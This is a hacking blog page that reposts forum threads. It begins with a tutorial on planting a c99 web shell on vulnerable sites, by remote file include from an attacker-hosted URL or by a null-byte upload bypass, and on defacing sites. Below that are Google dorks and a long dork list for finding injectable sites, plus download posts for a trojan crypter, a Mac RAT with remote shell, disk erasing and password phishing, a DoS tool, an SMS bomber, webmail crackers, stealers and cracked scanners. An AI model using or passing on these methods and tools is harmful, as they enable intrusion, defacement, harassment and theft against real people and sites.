Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

[TuT]THE WAY, TO UPLOAD SHELL ON VULNERABLE SITES[TuT



#
The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
#

#
A remote include works like this:
#

#

A website written in PHP includes files from a local directory. It usually looks something like this in the URL: "http://test.com/index.php?file=whatever" The part after the "?file=" is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : "http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
#

#
Get it?
#
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
#

#
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.
#

#

Now, lets take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:\My Documents\shell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text for as "". So, back to the upload form we go. As we go to upload our shell "C:\My Documents\shell.php" we will add to the end of that a Null Byte along with an extension. Now it looks something like this "C:\My Documents\shell.php.jpg"
#

#

(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators" and the like)
#

#

Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
#

#

Everyone got it now?
#

#

If all things go according to plan, your shell shall be uploaded and you can now take control.

II)
---
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
Quote:inurl:"upload.php"

Quote:inurl:"page=home.html"

Quote:inurl:"news/id="

That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
Quote:http://site.com/page=

On that page= you can put your shell so it would look like
Quote:http://site.com/page=http://geocities.co...13/c99.txt

credits To RiTaLiN


Read More Add your Comment 3 comments


list of online SQLi scanners, Very handy




Read More Add your Comment 7 comments


[Release] Cryptinator - A simple Encryption Application



So today i decided to make a program like the following one i saw earlier.
[Image: 43201152623pm.png]

But instead of just copying it exactly, i used a different encryption algorithm (polystairs) and different methods towards generating/compiling a code.

Im not sure what you would have use for this, but for me when ever i need a completely random string i will use this now :D prolly for some other things but yea. Hope you guys enjoy it! :D

Cryptinator ScreenShot:
[Image: screenshotzu.png]

Virus Scan
Download


Read More Add your Comment 1 comments


UniCrack v1.0 Beta/Trial [Gmail,Hotmail,Live,Yahoo] Cracker



[Image: unicrack.gif]

UniCrack v1.0 [Download]

[VirusTotal Scan]

VirusTotal Detects 1/41

Ikarus T3.1.1.103.0 2011.04.22 HackTool.Win32.VB.jz

not really sure why ? false positive tho feel free to Sandbox / Virtual Machine your heart out.


Read More Add your Comment 5 comments


[Tool]MD5 Crack Fast



Screenshot:
[Image: WLGnn.jpg]
[Image: ?action=result_img&task_id=192d4...mage=1.png]

Pack Contains :

[√]MD5 Crack Fast
Ultimate Distributed Cracker
Last Bit Md5 Password Cracker


Virus Scan - Analysis etc



[Image: D3Vxu.gif]
[Image: download-icon.gif] <--- PRESS THE BOX TO DOWNLOAD!

Please leave feedback/say thanks if you have downloaded it.


Read More Add your Comment 1 comments


iCrypt Err0r Version



his crypter makes ur trojan undetected

Never Upload @ virustotal use only NoVirusThanks.org

[Image: proggy.jpg]

Download



http://www.4shared.com/file/z1KjxfDn/iCr...rsion.html


Read More Add your Comment 0 comments


FREE Online Shell Checker [ Fast ][ VERY Reliable ][ Good for People With Slow Internet]



Hey, so here is an online shell checker

http://hf-alex.com/test/

Please do not click the "submit" button more than once and WAIT for it to load

I have used Curl so it should be fast and reliable

This is made more for reliability more than speed

this scans about 100 links in about 15-25 seconds

Once you see the submit button disappear the scan has finished..

The working urls will be in the box

This is very good for people with slow internet because all the checks are done server-side, that means all you have to do is wait for the checks to be done. The webpage is very small so it doesnt take up much bandwidth at all!
http://hackguide4u.blogspot.com Have fun and please say thanks if you used it :)
http://hackguide4u.blogspot.com


Read More Add your Comment 0 comments


Pre-Release] BlackHole RAT V2 [Test-Version]



Okay.. because some people have asked me "whats up with the next Version?" I will upload a Test-Version of the BlackHole RAT V2.

This Version is a little bit complicated to install and its untested!!

So what can you do with this Version?

- Execute Shell Comands remotly
- Chat with slave
- Read some Text on the slave Computer
- Display a Message
- Erase the HD
- Phish the Admin Password
- Block the Activity Monitor (after succsessfully phished Admin Pass)
- Shutdown, Reboot, Sleep and kill the Finder.app


What does this Version do?

- Adds itself to the Startup Items
- Is at the moment FUD
- Hidden From Dock, runs in background


What are the known Problems?

- Installation is a little bit complicated
- Server opens many Ports
- On every boot there will pop up a Window


Known Bugs?

- Server crashes when closing the Chat
- iSight Photo is not send complete
- ScreenShot function does not work in this Version


Okay now You know that all.. but this is only to show you what you can do with this on a Mac Computer. I will try to fix all Bugs and Problems as fast as I can.

Installation:

1. Start the Install.command
2. Drag&Drop the Files asked in the Terminal Window
3. After Installation finished, close the Terminal and reboot
4. Connect with the Client


To use the Block Activity Window Function, do this:

1. Open the Block Script with Apple-ScriptEditor
2. Enter the slave Admin Pass where it says "enteradminpasswordhere"
3. Save as Programm named "Block"
4. Copy to /Applications/JavaUpdater/Data/Block.app on the Victims Computer
5. Now you can use the Block function with the Client


I hope you will like this.Thumbsup

Note: The Client works on Windows AND Mac.

Here are some pics:



And here is the Total Virus scan:


I hope you will like it;)

Downloadlink: http://www.mediafire.com/?3nzk25p2jz8gjd1


Read More Add your Comment 0 comments


Youtube Link-bucks click increaser - [2000+ REAL clicks]



The view increaser feature in my youtube bot doesn't work as well as it use to ever since youtube's recent updates so i tested how well it would work on link-bucks and it makes 2000+ clicks per day, think i should add a link-bucks clicker feature to my bot? is 2000+ clicks any good?

[Image: logo_4.jpg]


Read More Add your Comment 2 comments


TeV DoS Tool | Easy DoS



This easy DoS tool was made by Elixed_ in java.
Direct download: https://www.dropbox.com/s/v7vb8ikl47kd8wl/TeV%20DoS.rar
Mirrors:

Virus scan: http://vscan.novirusthanks.org/analysis/...zLWV4ZQ==/

No idea why that moron virus scanner says that its a virus lol.

Created this almost a year ago, just found it at my old laptop and was like, why not post on HF.


It only go down for you when your own internet is shit. Else it will be down for everyone, it uses your internet connection.
http://www.downforeveryoneorjustme.com/


For the people that really wants a screen:


Read More Add your Comment 0 comments


Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool



Greetings All,

After a very successfull release of Sql Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with the new release which is more handy. It has new features as well as bug fixes from the older release. Please take a look for it below:

New Features:
"Look n Feel" is more attractive now.
Rich "Context Menu" items.
"Results" contain checkboxes to enable selection.
"Selected Dork" box is editable now for user convenience.
Built-in Browser for "Injection Builder" to check the impact of injection.
"Text Bucket" available for "Injection Builder" to save extra data.
"Insert Order By" button is added to "Injection Builder".
"Internet Browser" with Snapshot and HTML DOM Tree.

Bug Fixes:
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
Progress bar for "Crawler" has been fixed. It will show correct progress now.
Error on importing file is fixed now. You can import files from other directories as well.
"Searchqu" shows invalid results. It is fixed now.

Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool

[Image: scannert.png]
[Image: crawler.png]
[Image: injectionbuilder.png]
[Image: browsere.png]
[Image: sqlerrorlist.png]
[Image: aboutdx.png]

Download:
[Image: injectionorange.png]Link
Please rate me for this.

p0!z0neR



Read More Add your Comment 1 comments


xuhaid SQLi Scanner V3



xuhaid SQLi Scanner V3 ✩
--Status:[online]--


I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools!
Side Note: Better dork = more results! Keep that in mind!


Ok In This Version We have 2 New Scanner's Public & Private ... And In this Version I have added Duplicate Link remover Soo that after scanning you guys can easily remove duplicate Links.

Private Online SQLi Scanner V1
*Click here to Access*

Public Online SQLi Scanner V1
*Click here to Access*

Private Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*

Public Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*

Ok Public Version Will Log Your Links Which you'll Scan In Our Scanner For Those who hate scanning websites For more info Check here : http://sqlscanner.info/Public-Sql-Scanne...index.html

Public Scanner Version 1 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v1log.txt

Public Scanner Version 2 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v2log.txt

After Scanning You can Now easily Remove Links with one Click From here : http://sqlscanner.info/Repeatremover.html

About Version 2 If you Guys Dnt know This will Scan Only Vulnerable Sites
Example :
[Image: sql.GIF]

Dork List :

Code:
inurl:php?=id+gov
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

Quote:Use online sqli scanner (scan specific: websites/domains/countries)

Code:
www.sqlscanner.info

Quote:How to: Scan specific websites

Just use it like this:
inurl:php?id=+site:[domain of website]

you can either change it like:
inurl:php?page=+site:[domain of website]
inurl:php?type=+site:[domain of website]

If by any chance it fail's just put inurl or allinurl instead of site, like this:
inurl:php?id=+inurl:[domain of website]
inurl:php?id=+allinurl:[domain of website]

Examples:

If you want to scan specif countries websites:
for example .pt websites:
inurl:php?type=+site:.pt
or .br:
inurl:php?type=+site:.br

If you want to scan: http://www.thurrock.gov.uk
use: inurl:php?=id+site:thurrock.gov.uk

If You Face Any Kinda Problem Can Contact Me Online Here
: [Image: image.php?id=01]
Or reply to this thread - If you find Scanner stopped Working Lemme know i have another server i will release the link of that server

Private Online Scanner V1 Credits : R3miCk

Private Online Scanner V2 Credits : R3miCk ( Edited By me )

Public Online Scanner V1 Credits : R3miCk ( Edited By Me )

Public Online Scanner V2 Credits : R3miCk ( Edited By me )

Remove Duplicate : By Me ( XuhaiD )

Scan Specific Website Domain Credits : Hack.addict.pt

sqlscanner.info Index Page Credit's : th3-Outlaw Tools

Enjoy


Read More Add your Comment 0 comments


[VB.NET]How to make a nice GUI!



How to make a nice GUI!

Download SkinCrafter Light: Here

Open Visual Basic.
Go to toolbox at "Data" and right click "Choose Items..."

Click Browse... and select C:\Program Files\SkinCrafter3\skincrafter.net-vs2005 light\SkinCrafter.Net VS2005\skincrafter.net-vs2005_light.dll.

[Image: 37498571.png]

Press OK.

Now it will be here:

[Image: dataq.png]

Drag it to your form.

Go to its properties and select skin from here:

[Image: 12804104.jpg]

I always use Black_Pearl_st to my programs :D

[Image: 77122036.png]

Hope I helped you with this tutorial! :cool:


Read More Add your Comment 2 comments


HD VIDEO TUTORIAL; How to watch old youtube videos in High Quality and more.




Read More Add your Comment 1 comments


iStealer 6.3




Read More Add your Comment 0 comments


Turn Your Firefox into a Stealer Without any Software-Video {TuT}*




Read More Add your Comment 1 comments


Beaver's SMS Bomber Pro



Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List

GMail Is The Default SMTP Server That Is Used Which Has A Limit On The Number That Can Be Sent
Has A Lot Of Carriers Already Pre-Entered For You.
SMS Looks Like

FRM: Senders Email
SUBJ: Subject
MSG: Message

What Is New In The Pro Version:
New GUI
Error Handling, For Example If There Was An Error Sending The Message It Will Ask You If You Want To Change The E-mail/Password You Are Using. This Is Just One Of The Many Error Handling I Have Added.
[Image: 1XB4F.png]

DOWNLOAD :

Code:
http://rapidshare.com/#!download|536tl2|335533492|Beaver_s_SMS_Bomber_Pro.exe|1089

LINK to External Forums :
Code:
http://hotfile.com/links/98601927/b9d67df/Beaver_s_SMS_Bomber_Pro.rar

PASSWORD For external Forums :
Code:
smsbomberpro


Read More Add your Comment 2 comments


ACUNETIX VER 7.0 cracked Working and UPDATEABLE!!



ACUNETIX VER 7.0 cracked Working and UPDATEABLE!!

I have checked in : Windows xp desktop Pc and windows 7 Ultimate Laptop and is working and also is UPDATEABLE!! ..

But please only use in Vmware because i am not 100 % if is clean ...

Thanks...



Download Info

Code:
http://www.multiupload.com/EECTPQMDUH


Read More Add your Comment 0 comments


Pangolin Professional working TestEd



am ussing about 1-2 weeks and is working .. is allot better then Havij because cane work with https and also you cane upload files with load file function .. if the magic quetes are right ///

also please use only in vmware because i am not sure if is 100 % clean .. i have used in Vmware under windows xp ..


Download Info

Code:
http://www.multiupload.com/H5NWYJSASK


Read More Add your Comment 1 comments


TEAM p0ison shell private leaked!!contains great features of bypassing safe



[ Features ]
- Mass Defacement Tool
- Safe Mode Bypass
- Open_Basedir Bypass
- Fixed SQL managed
- FTP Brute Force Tool
- Fully Undetected
And more...
i can't attach ! :-??

Direct Link:

http://www.up.iranblog.com/images/zx2p8r...vdodzi.rar


Read More Add your Comment 1 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com